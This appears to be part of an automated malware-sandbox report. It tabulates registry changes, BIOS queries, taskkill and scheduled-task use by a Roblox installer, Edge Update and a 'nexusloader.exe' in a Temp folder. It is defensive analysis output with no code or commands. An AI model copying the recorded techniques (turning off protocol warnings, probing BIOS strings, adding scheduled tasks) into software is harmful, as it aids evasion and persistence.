| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133633811294308346" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods\ = "8" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\Elevation | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods\ = "8" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\ProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C} | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ = "IGoogleUpdate3Web" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Users\Admin\AppData\Local\Temp\onefile_3068_133633812190834193\nexusloader.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\LOCALSERVER32 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69} | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E} | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ = "IPolicyStatus2" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods\ = "24" | N/A | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}\PROGID | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ProxyStubClsid32 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C} | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ = "ICredentialDialog" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\PROGID | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}\ProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassSvc\CLSID\ = "{A6B716CB-028B-404D-B72C-50E153DD68DA}" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82CCB536-D2EE-4F19-9067-40531F08D1D4}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.41\\psmachine_64.dll" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.OnDemandCOMClassMachine" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\CLSID\ = "{CECDDD22-2E72-4832-9606-A9B0E5E344B2}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\VersionIndependentProgID | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreClass.1\ = "Microsoft Edge Update Core Class" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32 | N/A | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
